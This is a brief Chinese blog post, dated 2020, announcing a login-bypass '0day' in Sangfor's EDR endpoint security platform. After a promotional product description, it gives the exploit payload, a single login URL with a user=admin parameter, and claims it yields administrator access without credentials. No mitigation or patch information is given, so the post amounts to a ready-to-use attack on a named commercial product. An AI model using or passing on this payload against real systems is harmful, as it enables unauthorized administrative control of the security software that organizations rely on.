某某服-EDR终端任意用户登录 0day

简介:

深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。

 

漏洞描述:

通过恶意的payload可以以任意用户身份登录到终端检测响应平台EDR,此产品UI非常好看。

 

payload:

/ui/login.php?user=admin

 

绕过登录判断,直接拿到系统管理员/用户权限。

 

 

本文来自:哈拉少安全小队 公众号的:0n1师傅,欢迎大家关注,一起交流学习!

 

posted @ 2020-08-22 23:32  PANDA墨森  阅读(399)  评论(0编辑  收藏  举报